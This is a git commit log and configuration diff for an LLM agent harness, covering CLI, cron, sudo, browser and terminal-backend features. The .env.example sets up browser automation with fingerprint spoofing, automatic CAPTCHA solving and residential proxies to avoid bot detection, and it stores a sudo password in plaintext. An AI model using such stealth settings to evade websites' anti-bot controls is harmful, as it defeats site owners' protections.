- Updated the install script to attempt cloning via SSH first for private repositories, falling back to HTTPS if the SSH method fails.
- Added detailed error handling and user guidance for SSH key setup, improving the installation experience for users with private repositories.
2026-02-02 19:19:26 -08:00
teknium1
aa6394e94f Update install script to support SSH and HTTPS repository URLs
- Modified the install script to include separate variables for SSH and HTTPS repository URLs, enhancing flexibility for users during the cloning process.
- This change allows users to choose their preferred method of accessing the repository, improving the overall installation experience.
2026-02-02 19:19:12 -08:00
teknium1
ef409c6a24 Enhance repository cloning in install script
- Updated the install script to support both SSH and HTTPS cloning methods for the repository, improving flexibility for users with different access configurations.
- Added error handling and informative logging to guide users in case of cloning failures, particularly for private repositories requiring SSH key setup.
- Refactored the cloning logic to attempt SSH first, falling back to HTTPS if necessary, ensuring a smoother installation experience.
2026-02-02 19:19:07 -08:00
teknium1
da4167560f Enhance terminal backend selection in setup wizard
- Added platform detection to customize available terminal backend options based on the operating system (Linux, macOS, Windows).
- Updated terminal choices to include Singularity/Apptainer only for Linux users, with appropriate warnings for unsupported selections.
- Improved user prompts for Docker and local configurations to provide platform-specific guidance.
- Refactored backend selection logic to streamline the process and ensure accurate mapping of user choices to backend configurations.
2026-02-02 19:15:30 -08:00
teknium1
3488576bd8 Update terminal configuration and enhance CLI model management
- Changed default Docker, Singularity, and Modal images in configuration files to use "nikolaik/python-nodejs:python3.11-nodejs20" for improved compatibility.
- Updated the default model in the configuration to "anthropic/claude-sonnet-4.5" and adjusted related setup prompts for API provider configuration.
- Introduced a new CLI option for selecting a custom OpenAI-compatible endpoint, enhancing flexibility in model provider setup.
- Enhanced the prompt choice functionality to support arrow key navigation for better user experience in CLI interactions.
- Updated documentation in relevant files to reflect these changes and improve user guidance.
2026-02-02 19:13:41 -08:00
teknium1
619c72e566 Enhance CLI with multi-platform messaging integration and configuration management
- Updated CLI to load configuration from user-specific and project-specific YAML files, prioritizing user settings.
- Introduced a new command `/platforms` to display the status of connected messaging platforms (Telegram, Discord, WhatsApp).
- Implemented a gateway system for handling messaging interactions, including session management and delivery routing for cron job outputs.
- Added support for environment variable configuration and a dedicated gateway configuration file for advanced settings.
- Enhanced documentation in README.md and added a new messaging.md file to guide users on platform integrations and setup.
- Updated toolsets to include platform-specific capabilities for Telegram, Discord, and WhatsApp, ensuring secure and tailored interactions.
2026-02-02 19:01:51 -08:00
teknium1
a3ba41fce2 Implement cron job management system for scheduled tasks (similar to OpenAI's Pulse but the AI can also schedule jobs)
- Introduced a new cron job system allowing users to schedule automated tasks via the CLI, supporting one-time reminders and recurring jobs.
- Added commands for managing cron jobs: `/cron` to list jobs, `/cron add` to create new jobs, and `/cron remove` to delete jobs.
- Implemented job storage in `~/.hermes/cron/jobs.json` with output saved to `~/.hermes/cron/output/{job_id}/{timestamp}.md`.
- Enhanced the CLI and README documentation to include detailed usage instructions and examples for cron job management.
- Integrated cron job tools into the hermes-cli toolset, ensuring they are only available in interactive CLI mode.
- Added support for cron expression parsing with the `croniter` package, enabling flexible scheduling options.
2026-02-02 08:26:42 -08:00
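For the recurring-job side, the `croniter` package named above turns a cron expression into successive fire times; a minimal illustration:

```python
from datetime import datetime
from croniter import croniter

# "Every day at 09:00": compute the next two run times from now.
schedule = croniter("0 9 * * *", datetime.now())
print(schedule.get_next(datetime))  # next 09:00
print(schedule.get_next(datetime))  # the 09:00 after that
```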
teknium1
c935a604f8 Refactor TODO.md to reorganize task sections and update descriptions
- Renamed and reordered sections in the TODO list for clarity, moving "Interactive Clarifying Questions Tool" to section 5 and "Collaborative Problem Solving" to section 6.
- Removed outdated ideas related to task continuation hints and resource awareness, streamlining the focus on current development priorities.
- Enhanced the overall structure of the TODO list to better reflect ongoing and future tasks.
2026-02-02 01:25:03 -08:00
teknium1
e114f09f70 Implement reasoning extraction and enhance assistant message handling
- Added a new method `_extract_reasoning` to extract reasoning content from assistant messages, accommodating multiple formats from various providers.
- Updated message handling to ensure all assistant messages include reasoning content for API compatibility, preserving multi-turn reasoning context.
- Enhanced logging to capture reasoning details for debugging and analysis.
- Modified the TODO.md to reflect changes in planning and task management, emphasizing the need for structured task decomposition and progress tracking.
2026-02-01 22:48:18 -08:00
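Providers expose reasoning in several shapes (a dedicated field, or inline <think> tags), so an extractor along these lines has to probe each in turn. This is a sketch under that assumption, not the actual `_extract_reasoning`:

```python
def extract_reasoning(message: dict):
    """Best-effort extraction of reasoning content from an assistant message dict."""
    # Dedicated fields used by some providers (field names vary by provider).
    for key in ("reasoning", "reasoning_content"):
        if message.get(key):
            return message[key]
    # Inline <think>...</think> tags used by others.
    content = message.get("content") or ""
    if "<think>" in content and "</think>" in content:
        return content.split("<think>", 1)[1].split("</think>", 1)[0].strip()
    return None
```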
teknium1
9b4d9452ba Add context compression feature for long conversations
- Implemented automatic context compression to manage long conversations that approach the model's context limit.
- Configured the feature to summarize middle turns while protecting the first three and last four turns, ensuring important context is retained.
- Added configuration options in `cli-config.yaml` and environment variables for enabling/disabling compression and setting thresholds.
- Updated documentation in `README.md`, `cli.md`, and `.env.example` to explain the context compression functionality and its configuration.
- Enhanced the `cli.py` to load compression settings into environment variables, ensuring seamless integration with the CLI.
- Completed the implementation of context compression as outlined in the TODO list, marking it as a significant enhancement to conversation management.
2026-02-01 18:01:31 -08:00
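The protected-window scheme amounts to summarizing only the middle slice of the turn list; roughly (hypothetical helper names, with a stub standing in for the real LLM summary call):

```python
def summarize(turns: list) -> str:
    # Stand-in for the real LLM-backed summarizer.
    return f"{len(turns)} earlier turns elided."

def compress_context(turns: list, head: int = 3, tail: int = 4) -> list:
    """Summarize middle turns while keeping the first `head` and last `tail` intact."""
    if len(turns) <= head + tail:
        return turns  # nothing worth compressing
    summary = summarize(turns[head:-tail])
    bridge = {"role": "user", "content": f"[Summary of earlier turns]\n{summary}"}
    return turns[:head] + [bridge] + turns[-tail:]
```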
teknium1
bbeed5b5d1 Enhance session logging and interactive sudo support
- Implemented automatic session logging, saving conversation trajectories to the `logs/` directory in JSON format, with each session having a unique identifier.
- Updated the CLI to display the session ID in the welcome banner for easy reference.
- Introduced an interactive sudo password prompt in CLI mode, allowing users to enter their password with a 45-second timeout, enhancing user experience during command execution.
- Documented session logging and interactive sudo features in `README.md`, `cli.md`, and `cli-config.yaml.example` for better user guidance.
2026-02-01 15:36:26 -08:00
teknium1
971ed2bbdf Implement sudo support across terminal environments
- Added support for sudo commands in local, Docker, Singularity, and SSH environments by introducing the `SUDO_PASSWORD` environment variable.
- Updated terminal tool configurations in `.env.example` and `cli-config.yaml.example` to document the new sudo functionality.
- Enhanced the command execution process to handle sudo commands gracefully, preventing hangs on interactive prompts and providing clear error messages when no password is configured.
- Updated `README.md` to include instructions for using sudo support and SSH backend configuration.
- Revised `TODO.md` to reflect the completion of the sudo feature and outline future enhancements.
2026-02-01 10:02:34 -08:00
Teknium
affc4e9a8f Update TODO.md 2026-02-01 02:05:03 -08:00
teknium1
3db83b6824 Revise TODO.md to introduce Subagent Architecture and Interactive Clarifying Questions Tool
- Updated the structure of the TODO list, renaming and expanding the "Context Management" section to "Subagent Architecture" with detailed problem and solution descriptions.
- Added a new section for "Interactive Clarifying Questions Tool," outlining the problem of agent assumptions and proposing a multiple-choice prompt tool for user interaction.
- Included implementation details and benefits for both features, enhancing clarity and direction for future development.
2026-02-01 02:02:32 -08:00
teknium1
9c8d707530 Update .gitignore to include additional ignored files
- Added 'images/' to the ignore list to prevent tracking of image files.
- Retained existing entries for private keys and CLI config to maintain security and privacy.
2026-02-01 01:33:59 -08:00
teknium1
8f5f99c22a Add new skills descriptions and enhance skills tool functionality
- Added detailed descriptions for new skills categories: Machine Learning Operations and Note Taking.
- Introduced a new Obsidian skill with commands for reading, listing, searching, creating, and appending notes.
- Enhanced the skills tool to load and display category descriptions from DESCRIPTION.md files, improving user guidance and discovery of available skills.
2026-02-01 01:32:21 -08:00
teknium1
32254d3010 Add skills guidance to system prompts in run_agent.py
- Introduced a default skills guidance prompt to assist the model in checking relevant skills before technical tasks.
- Updated the logic in AIAgent to auto-include skills guidance when skills tools are available, enhancing the model's contextual understanding during API calls.
2026-02-01 01:31:59 -08:00
teknium1
20f2875472 Implement browser session inactivity timeout and cleanup
- Updated `.env.example` to include `BROWSER_INACTIVITY_TIMEOUT` for auto-cleanup of inactive sessions.
- Enhanced `cli.py` to load the new inactivity timeout configuration into environment variables.
- Added background thread functionality in `browser_tool.py` to periodically clean up inactive browser sessions based on the configured timeout.
- Improved session management by tracking last activity timestamps and ensuring cleanup occurs when sessions exceed inactivity limits.
2026-01-31 21:42:15 -08:00
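The cleanup loop described here can be as small as a daemon thread sweeping a last-activity map (a sketch; the real session bookkeeping in browser_tool.py differs):

```python
import threading
import time

sessions = {}  # session_id -> last-activity timestamp
INACTIVITY_TIMEOUT = 120  # seconds, mirroring BROWSER_INACTIVITY_TIMEOUT

def close_session(session_id: str) -> None:
    print(f"closing inactive browser session {session_id}")  # stand-in for real teardown
    sessions.pop(session_id, None)

def reaper() -> None:
    while True:
        now = time.time()
        for sid, last_seen in list(sessions.items()):
            if now - last_seen > INACTIVITY_TIMEOUT:
                close_session(sid)
        time.sleep(30)  # sweep interval

threading.Thread(target=reaper, daemon=True).start()
```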
teknium
c360da4f35 Enhance documentation for CLI and tool integration
- Updated `.cursorrules` to provide a comprehensive overview of the interactive CLI, including its architecture, key components, and command handling.
- Expanded `README.md` to introduce the CLI features, quick start instructions, and detailed command descriptions for user guidance.
- Added `docs/cli.md` to document CLI usage, configuration, and animated feedback, ensuring clarity for users and developers.
- Revised `docs/tools.md` to include support for SSH backend in terminal tools, enhancing the documentation for terminal execution options.
2026-01-31 06:33:43 +00:00
teknium
bc76a032ba Add a claude code-like CLI
- Introduced `cli-config.yaml.example` to provide a template for configuring the CLI behavior, including model settings, terminal tool configurations, agent behavior, and toolsets.
- Created `cli.py` for an interactive terminal interface, allowing users to start the Hermes Agent with various options and toolsets.
- Added `hermes` launcher script for convenient CLI access.
- Updated `model_tools.py` to support quiet mode for suppressing output during tool initialization and execution.
- Enhanced logging in various tools to respect quiet mode, improving user experience by reducing unnecessary output.
- Added `prompt_toolkit` to `requirements.txt` for improved CLI interaction capabilities.
- Created `TODO.md` for future improvements and enhancements to the Hermes Agent framework.
2026-01-31 06:30:48 +00:00
teknium
8e986584f4 Update .gitignore to include private keys and CLI config
- Added patterns to ignore private key files (*.ppk, *.pem) and any files starting with 'privvy'.
- Included cli-config.yaml in the ignore list to prevent sensitive SSH paths from being tracked.
2026-01-31 06:28:39 +00:00
teknium
4b68d30b0e Moved "architecture" dir to "docs" for clarity 2026-01-30 07:54:51 +00:00
teknium
b292192467 Enhance documentation for skills system and project structure
- Expanded `.cursorrules` to include detailed sections on the skills system, outlining the directory structure, progressive disclosure pattern, and YAML frontmatter usage for skill files.
- Updated `README.md` to introduce skills tools, providing examples of usage and creation, along with a comprehensive overview of available skills functionalities.
- Enhanced `architecture/tools.md` to document the skills tools and their integration within the Hermes-Agent framework, ensuring clarity for developers and users.
2026-01-30 07:54:21 +00:00
teknium
f172f7d4aa Add skills tools and enhance model integration
- Introduced new skills tools: `skills_categories`, `skills_list`, and `skill_view` in `model_tools.py`, allowing for better organization and access to skill-related functionalities.
- Updated `toolsets.py` to include a new `skills` toolset, providing a dedicated space for skill tools.
- Enhanced `batch_runner.py` to recognize and validate skills tools during batch processing.
- Added comprehensive tool definitions for skills tools, ensuring compatibility with OpenAI's expected format.
- Created new shell script `test_skills_kimi.sh` for testing skills tool functionality with Kimi K2.5.
- Added example skill files demonstrating the structure and usage of skills within the Hermes-Agent framework, including `SKILL.md` for example and audiocraft skills.
- Improved documentation for skills tools and their integration into the existing tool framework, ensuring clarity for future development and usage.
2026-01-30 07:39:55 +00:00
teknium
8e8b6be690 Add timeout configuration for trajectory processing
- Updated `trajectory_compression.yaml` to include a new `per_trajectory_timeout` setting, allowing for a timeout of 300 seconds per trajectory. This enhancement helps prevent hanging on problematic entries during processing, improving overall reliability and efficiency in trajectory handling.
2026-01-30 07:34:58 +00:00
teknium
e8c6135a91 Update documentation for project structure and tool integration
- Expanded the `.cursorrules` file to include detailed sections on project structure, file dependency chain, and guidelines for adding new tools.
- Provided a comprehensive tool implementation pattern and outlined requirements for stateful tools and environment variables.
- Enhanced clarity on the agent loop and reasoning model support, ensuring better understanding for future development and contributions.
2026-01-30 07:34:12 +00:00
teknium
771cf41fea Update environment configuration and enhance terminal tool integration
- Modified `.env.example` to set the default terminal environment to 'singularity' and updated Docker and Singularity image references for better compatibility.
- Enhanced `run_mixed_tasks.sh` and `run_terminal_tasks.sh` scripts to utilize the new Singularity setup, including improved logging and cache directory management.
- Introduced functionality in `terminal_tool.py` to automatically build and cache SIF images from Docker URLs, streamlining the execution environment setup.
- Updated logging messages for clarity on image usage and cache directory paths.
2026-01-29 22:47:11 +00:00
teknium
7ea17bb957 Update environment configuration and enhance tool definitions
- Modified `.env.example` to set default terminal environment to 'local' and updated Docker, Singularity, and Modal image references to use 'python:3.11-slim'.
- Updated `package.json` to include Node.js engine requirements and modified post-install script for better user guidance.
- Enhanced `pyproject.toml` to reflect new dependencies and optional dependencies for modal and development environments.
- Improved `README.md` with additional setup instructions for Singularity and Node.js dependencies, along with clearer toolset documentation.
- Refactored `model_tools.py` to include new tool definitions and ensure consistency across toolsets.
- Updated architecture documentation to clarify tool structure and registration processes.
2026-01-29 22:36:07 +00:00
teknium
f8846f85a1 Add package.json and package-lock.json for project setup
- Created package.json to define project metadata, dependencies, and scripts for the Hermes-Agent.
- Added package-lock.json to lock dependency versions, ensuring consistent installations across environments.
- Included agent-browser as a dependency for enhanced tool-calling capabilities.
2026-01-29 22:23:17 +00:00
teknium
4c05ef0ba8 Enhance logging and tool initialization for improved performance
- Updated logging configuration in `run_agent.py` to suppress debug messages from additional third-party libraries, reducing noise in logs.
- Enhanced shell scripts for terminal tasks to utilize Singularity for containerized execution, including pre-build SIF image logic and improved logging.
- Refactored tool initialization in `mixture_of_agents_tool.py`, `vision_tools.py`, and `web_tools.py` to implement lazy loading of API clients, optimizing resource usage and error handling.
- Updated ephemeral system prompts in shell scripts to provide clearer guidance on task execution and resource usage.
2026-01-29 19:59:59 +00:00
teknium
5438b64e32 Add new shell scripts for various task runs
- Introduced `run_browser_tasks.sh` for executing browser-focused data generation tasks with specific guidelines for automation.
- Added `run_eval_glm4.7_newterm.sh` for evaluating terminal tasks using the GLM 4.7 model, including logging and configuration for terminal environments.
- Created `run_eval_terminal.sh` for terminal-only evaluations with Modal sandboxes, ensuring proper logging and environment setup.
- Developed `run_mixed_tasks.sh` for running mixed browser and terminal tasks, integrating capabilities for both environments.
- Implemented `run_terminal_tasks.sh` for terminal-focused data generation, with detailed instructions for task execution and logging.
- All scripts include timestamped logging for better tracking of task execution and outputs.
2026-01-29 06:11:12 +00:00
teknium
248acf715e Add browser automation tools and enhance environment configuration
- Introduced new browser automation tools in `browser_tool.py` for navigating, interacting with, and extracting content from web pages using the agent-browser CLI and Browserbase cloud execution.
- Updated `.env.example` to include new configuration options for Browserbase API keys and session settings.
- Enhanced `model_tools.py` and `toolsets.py` to integrate browser tools into the existing tool framework, ensuring consistent access across toolsets.
- Updated `README.md` with setup instructions for browser tools and their usage examples.
- Added new test script `test_modal_terminal.py` to validate Modal terminal backend functionality.
- Improved `run_agent.py` to support browser tool integration and logging enhancements for better tracking of API responses.
2026-01-29 06:10:24 +00:00
teknium
54ca0997ee Update .gitignore to include additional directories and files
- Added entries for `node_modules/`, `browser-use/`, and `agent-browser/` to prevent unnecessary files from being tracked.
- Updated the `data/` entry to `data/*` for consistency in ignoring data files.
- Ensured no newline at the end of the file for proper formatting.
2026-01-29 06:04:25 +00:00
teknium
b78076cac7 Enhance trajectory_compressor.py with new input options and sampling functionality
- Updated the main function to accept both single JSONL files and directories for compression.
- Added support for sampling a percentage of trajectories before compression.
- Improved usage documentation with detailed examples for various compression scenarios.
- Enhanced error handling for input validation and dry run mode.
- Streamlined output handling to manage temporary files during processing.
2026-01-29 06:04:13 +00:00
teknium
ba19d530ad Update environment configuration and enhance terminal tool integration
- Updated `.env.example` to include new API keys and configuration options for the mini-swe-agent backend, including support for local, Docker, and Modal environments.
- Added `.gitmodules` to include mini-swe-agent as a submodule for easier integration.
- Refactored `mini_swe_runner.py` to use the updated model format and default to OpenRouter for API calls.
- Enhanced `model_tools.py` to support the new terminal tool definitions and ensure compatibility with the mini-swe-agent backend.
- Updated `README.md` to reflect changes in setup instructions and environment variable configurations.
- Improved `terminal_tool.py` to manage execution environments and lifecycle, ensuring proper cleanup and error handling.
- Introduced `terminal_hecate.py` for executing commands on MorphCloud VMs, providing an alternative backend for terminal operations.
2026-01-23 12:26:53 +00:00
teknium
47555602d7 Add mini-swe-agent runner and trajectory compressor
- Introduced mini_swe_runner.py for executing tasks using mini-swe-agent environments (local, Docker, Modal) and outputting trajectories in Hermes format.
- Implemented trajectory_compressor.py to post-process agent trajectories, compressing them within a target token budget while preserving essential content.
- Added trajectory_compression.yaml configuration file for customizable compression settings.
- Created sample_and_compress.py script to download, sample, and compress trajectories from HuggingFace datasets.
- Enhanced logging and error handling across new modules for improved usability and debugging.
2026-01-23 00:52:46 +00:00
teknium
6eb76c7c1a Enhance batch processing and image generation tools
- Updated batch processing to include robust resume functionality by scanning completed prompts based on content rather than indices, improving recovery from failures.
- Implemented retry logic for image downloads with exponential backoff to handle transient failures effectively.
- Refined image generation tool to utilize the FLUX 2 Pro model, updating descriptions and parameters for clarity and consistency.
- Added new configuration scripts for GLM 4.7 and Imagen tasks, enhancing usability and logging capabilities.
- Removed outdated scripts and test files to streamline the codebase.
2026-01-18 10:11:59 +00:00
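Retry with exponential backoff for the image downloads is the classic doubling pattern; a generic sketch (not the repo's exact code):

```python
import time
import urllib.request

def download_with_retry(url: str, attempts: int = 5, base_delay: float = 1.0) -> bytes:
    """Fetch a URL, retrying transient failures with exponentially growing delays."""
    for attempt in range(attempts):
        try:
            with urllib.request.urlopen(url, timeout=30) as resp:
                return resp.read()
        except OSError:
            if attempt == attempts - 1:
                raise  # out of retries
            time.sleep(base_delay * (2 ** attempt))  # 1s, 2s, 4s, ...
    raise RuntimeError("unreachable")
```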
teknium
b32cc4b09d Refactor batch processing with rich progress tracking and update logging in AIAgent
- Replaced tqdm with rich for enhanced visual progress tracking in batch processing.
- Adjusted logging levels in AIAgent to suppress asyncio debug messages.
- Modified datagen script to reduce number of workers for improved performance.
2026-01-14 14:02:59 +00:00
teknium
6e3dbb8d8b Enhance batch processing with progress tracking and update AIAgent for OpenRouter detection
- Integrated tqdm for progress tracking in batch processing, replacing map with imap_unordered for improved performance.
- Added base_url attribute in AIAgent to facilitate OpenRouter detection.
2026-01-14 13:46:16 +00:00
teknium
b66c093316 add default datagen example script 2026-01-14 13:41:09 +00:00
teknium
13d360030f Enhance tool normalization and API integration across modules
- Introduced normalization functions for tool statistics and error counts to ensure consistent schema across all trajectory entries, facilitating compatibility with HuggingFace datasets.
- Updated batch processing to utilize normalized tool stats and error counts, improving data integrity.
- Refactored vision tools and mixture of agents tool to integrate with OpenRouter API, replacing Nous Research API references and updating model configurations.
- Enabled reasoning capabilities in API calls for enhanced response quality across various tools.
- Improved error handling and API key validation for OpenRouter integration.
2026-01-14 13:40:10 +00:00
teknium
66daebe88f Implement enhanced response handling and tool call validation in run_agent
- Added methods to check for meaningful content after <think> blocks and to retrieve messages up to the last complete assistant turn.
- Introduced retry logic for handling truncated responses and invalid JSON arguments in tool calls, with a maximum retry limit.
- Improved logging for invalid JSON and empty responses, ensuring better error tracking and handling.
- Updated the batch data generation script to adjust dataset file, batch size, and ephemeral system prompt for improved context management.
2026-01-10 13:04:43 +00:00
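Checking for "meaningful content after <think> blocks" reduces to stripping the think spans and testing what remains; a sketch:

```python
import re

THINK_BLOCK = re.compile(r"<think>.*?</think>", re.DOTALL)

def has_meaningful_content(text: str) -> bool:
    """True if anything non-whitespace survives once <think>...</think> spans are removed."""
    return bool(THINK_BLOCK.sub("", text).strip())
```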
teknium
4071ba29da Enhance batch processing and tool validation
- Added support for tracking partial results and tool error counts in batch processing.
- Implemented filtering of corrupted entries during batch file combination based on valid tool names.
- Updated terminal tool to improve command execution and error handling, including retry logic for transient failures.
- Refactored model tools to use a simple terminal tool with no session persistence.
- Improved logging and error messages for invalid API responses and tool calls.
- Introduced chunked processing for large content in web tools to manage size limitations effectively.
2026-01-10 05:56:26 +00:00
Teknium
21f9e2df40 Merge pull request #14 from NousResearch/speed-upgrades
updates for stability and speed
2026-01-08 01:04:15 -08:00
Teknium
80d326310e Merge branch 'main' into speed-upgrades 2026-01-08 01:03:34 -08:00
Teknium
53fc705b13 Merge pull request #8 from NousResearch/update-snapshot-id
Update snapshot id for ipython
2026-01-08 01:00:24 -08:00
Teknium
d5af53888a Merge pull request #3 from NousResearch/architecture-planning
Architecture planning
2026-01-08 01:00:00 -08:00
Teknium
a7a37249f7 Merge branch 'main' into architecture-planning 2026-01-08 00:59:51 -08:00
teknium
6af6ff2a0a updates for stability and speed 2026-01-08 08:57:51 +00:00
Teknium
30ca282594 Merge pull request #11 from NousResearch/simplify-terminal
Add simple terminal
2025-11-22 02:26:01 -08:00
hjc-puro
0fbc0475f3 update snapshot id for ipython 2025-11-05 02:11:25 -05:00
Dakota
e5e77381f0 Made to be more descriptive from comments 2025-09-12 18:10:36 -05:00
Dakota
066514e2a9 add more architecture docs 2025-09-12 17:47:32 -05:00
Dakota
045a1737f8 - message graphs 2025-09-12 10:25:14 -05:00
866 changed files with 348979 additions and 3583 deletions

.cursorrules (deleted)

@@ -1,23 +0,0 @@
Hermes-Agent is an agent harness for LLMs.
When building, the tool functionality is in the tools/ directory, where each specific tool (or, in some cases, a group of tools built for the same execution category or API) gets its own script.
Each tool is then consolidated in the model_tools.py file in the repo root.
There is also a way to consolidate sets of tools in toolsets.py for the agent to use.
The primary agent runner code is in run_agent, but other runners could be developed using the tools and framework.
Always ensure consistency between the tools, model_tools.py, and toolsets.py when changing any of them; otherwise they can become desynced in a way that is detrimental to functionality.
The expected pathway for API keys is to set them up in a .env file in the repo root.
Test scripts will be placed in tests/
The run_agent loop is set up to:
- Process the enabled toolsets to provide to the model,
- Pipe in a prompt or problem from the input to the agent,
- Loop the LLM each time it calls a tool, until the model decides no more tools are needed and provides a natural language response,
- Return that response.
There are additional caveats for logging, where we restructure the "tools" as a system prompt so the trajectory can later be stored and handled in a usable format.

.env.example (modified)

@@ -1,49 +1,277 @@
# Hermes Agent Environment Configuration
# Copy this file to .env and fill in your API keys
# Get API keys from the URLs listed below
# =============================================================================
# REQUIRED API KEYS
# LLM PROVIDER (OpenRouter)
# =============================================================================
# OpenRouter provides access to many models through one API
# All LLM calls go through OpenRouter - no direct provider keys needed
# Get your key at: https://openrouter.ai/keys
OPENROUTER_API_KEY=
# Anthropic API Key - Main agent model
# Get at: https://console.anthropic.com/
ANTHROPIC_API_KEY=
# Default model to use (OpenRouter format: provider/model)
# Examples: anthropic/claude-opus-4.6, openai/gpt-4o, google/gemini-3-flash-preview, zhipuai/glm-4-plus
LLM_MODEL=anthropic/claude-opus-4.6
# =============================================================================
# LLM PROVIDER (z.ai / GLM)
# =============================================================================
# z.ai provides access to ZhipuAI GLM models (GLM-4-Plus, etc.)
# Get your key at: https://z.ai or https://open.bigmodel.cn
GLM_API_KEY=
# GLM_BASE_URL=https://api.z.ai/api/paas/v4 # Override default base URL
# =============================================================================
# LLM PROVIDER (Kimi / Moonshot)
# =============================================================================
# Kimi Code provides access to Moonshot AI coding models (kimi-k2.5, etc.)
# Get your key at: https://platform.kimi.ai (Kimi Code console)
# Keys prefixed sk-kimi- use the Kimi Code API (api.kimi.com) by default.
# Legacy keys from platform.moonshot.ai need KIMI_BASE_URL override below.
KIMI_API_KEY=
# KIMI_BASE_URL=https://api.kimi.com/coding/v1 # Default for sk-kimi- keys
# KIMI_BASE_URL=https://api.moonshot.ai/v1 # For legacy Moonshot keys
# KIMI_BASE_URL=https://api.moonshot.cn/v1 # For Moonshot China keys
# =============================================================================
# LLM PROVIDER (MiniMax)
# =============================================================================
# MiniMax provides access to MiniMax models (global endpoint)
# Get your key at: https://www.minimax.io
MINIMAX_API_KEY=
# MINIMAX_BASE_URL=https://api.minimax.io/v1 # Override default base URL
# MiniMax China endpoint (for users in mainland China)
MINIMAX_CN_API_KEY=
# MINIMAX_CN_BASE_URL=https://api.minimaxi.com/v1 # Override default base URL
# =============================================================================
# TOOL API KEYS
# =============================================================================
# Firecrawl API Key - Web search, extract, and crawl
# Get at: https://firecrawl.dev/
FIRECRAWL_API_KEY=
# Nous Research API Key - Vision analysis and multi-model reasoning
# Get at: https://inference-api.nousresearch.com/
NOUS_API_KEY=
# Morph API Key - Terminal/command execution tools
# Get at: https://morph.so/
MORPH_API_KEY=
# FAL.ai API Key - Image generation
# Get at: https://fal.ai/
FAL_KEY=
# =============================================================================
# OPTIONAL API KEYS
# =============================================================================
# OpenAI API Key - Optional, for enhanced Hecate features
# Get at: https://platform.openai.com/
OPENAI_API_KEY=
# Honcho - Cross-session AI-native user modeling (optional)
# Builds a persistent understanding of the user across sessions and tools.
# Get at: https://app.honcho.dev
# Also requires ~/.honcho/config.json with enabled=true (see README).
HONCHO_API_KEY=
# =============================================================================
# OPTIONAL CONFIGURATION
# TERMINAL TOOL CONFIGURATION (mini-swe-agent backend)
# =============================================================================
# Backend type: "local", "singularity", "docker", "modal", or "ssh"
# Terminal backend is configured in ~/.hermes/config.yaml (terminal.backend).
# Use 'hermes setup' or 'hermes config set terminal.backend docker' to change.
# Supported: local, docker, singularity, modal, ssh
#
# Only override here if you need to force a backend without touching config.yaml:
# TERMINAL_ENV=local
# Terminal Tool Settings
HECATE_VM_LIFETIME_SECONDS=300
HECATE_DEFAULT_SNAPSHOT_ID=snapshot_p5294qxt
# Container images (for singularity/docker/modal backends)
# TERMINAL_DOCKER_IMAGE=nikolaik/python-nodejs:python3.11-nodejs20
# TERMINAL_SINGULARITY_IMAGE=docker://nikolaik/python-nodejs:python3.11-nodejs20
TERMINAL_MODAL_IMAGE=nikolaik/python-nodejs:python3.11-nodejs20
# Debug Logging (set to "true" to enable, logs saved to ./logs/)
# Working directory for terminal commands
# For local backend: "." means current directory (resolved automatically)
# For remote backends (ssh/docker/modal/singularity): use an absolute path
# INSIDE the target environment, or leave unset for the backend's default
# (/root for modal, / for docker, ~ for ssh). Do NOT use a host-local path.
# Usually managed by config.yaml (terminal.cwd) — uncomment to override
# TERMINAL_CWD=.
# Default command timeout in seconds
TERMINAL_TIMEOUT=60
# Cleanup inactive environments after this many seconds
TERMINAL_LIFETIME_SECONDS=300
# =============================================================================
# SSH REMOTE EXECUTION (for TERMINAL_ENV=ssh)
# =============================================================================
# Run terminal commands on a remote server via SSH.
# Agent code stays on your machine, commands execute remotely.
#
# SECURITY BENEFITS:
# - Agent cannot read your .env file (API keys protected)
# - Agent cannot modify its own code
# - Remote server acts as isolated sandbox
# - Can safely configure passwordless sudo on remote
#
# TERMINAL_SSH_HOST=192.168.1.100
# TERMINAL_SSH_USER=agent
# TERMINAL_SSH_PORT=22
# TERMINAL_SSH_KEY=~/.ssh/id_rsa
# =============================================================================
# SUDO SUPPORT (works with ALL terminal backends)
# =============================================================================
# If set, enables sudo commands by piping password via `sudo -S`.
# Works with: local, docker, singularity, modal, and ssh backends.
#
# SECURITY WARNING: Password stored in plaintext. Only use on trusted machines.
#
# ALTERNATIVES:
# - For SSH backend: Configure passwordless sudo on the remote server
# - For containers: Run as root inside the container (no sudo needed)
# - For local: Configure /etc/sudoers for specific commands
# - For CLI: Leave unset - you'll be prompted interactively with 45s timeout
#
# SUDO_PASSWORD=your_password_here
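For reference, piping a password via `sudo -S` as described above looks roughly like this from Python (a sketch; the actual backend wiring differs per environment):

```python
import os
import subprocess

def run_sudo(command: str) -> subprocess.CompletedProcess:
    password = os.environ.get("SUDO_PASSWORD")
    if not password:
        raise RuntimeError("sudo requested but SUDO_PASSWORD is not configured")
    # -S reads the password from stdin; -p '' suppresses the interactive prompt text.
    return subprocess.run(
        ["sudo", "-S", "-p", "", "sh", "-c", command],
        input=password + "\n",
        capture_output=True,
        text=True,
    )
```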
# =============================================================================
# MODAL CLOUD BACKEND (Optional - for TERMINAL_ENV=modal)
# =============================================================================
# Modal uses CLI authentication, not environment variables.
# Run: pip install modal && modal setup
# This will authenticate via browser and store credentials locally.
# No API key needed in .env - Modal handles auth automatically.
# =============================================================================
# BROWSER TOOL CONFIGURATION (agent-browser + Browserbase)
# =============================================================================
# Browser automation requires Browserbase cloud service for remote browser execution.
# This allows the agent to navigate websites, fill forms, and extract information.
#
# STEALTH MODES:
# - Basic Stealth: ALWAYS active (random fingerprints, auto CAPTCHA solving)
# - Advanced Stealth: Requires BROWSERBASE_ADVANCED_STEALTH=true (Scale Plan only)
# Browserbase API Key - Cloud browser execution
# Get at: https://browserbase.com/
BROWSERBASE_API_KEY=
# Browserbase Project ID - From your Browserbase dashboard
BROWSERBASE_PROJECT_ID=
# Enable residential proxies for better CAPTCHA solving (default: true)
# Routes traffic through residential IPs, significantly improves success rate
BROWSERBASE_PROXIES=true
# Enable advanced stealth mode (default: false, requires Scale Plan)
# Uses custom Chromium build to avoid bot detection altogether
BROWSERBASE_ADVANCED_STEALTH=false
# Browser session timeout in seconds (default: 300)
# Sessions are cleaned up after this duration of inactivity
BROWSER_SESSION_TIMEOUT=300
# Browser inactivity timeout - auto-cleanup inactive sessions (default: 120 = 2 min)
# Browser sessions are automatically closed after this period of no activity
BROWSER_INACTIVITY_TIMEOUT=120
# =============================================================================
# SESSION LOGGING
# =============================================================================
# Session trajectories are automatically saved to logs/ directory
# Format: logs/session_YYYYMMDD_HHMMSS_UUID.json
# Contains full conversation history in trajectory format for debugging/replay
# =============================================================================
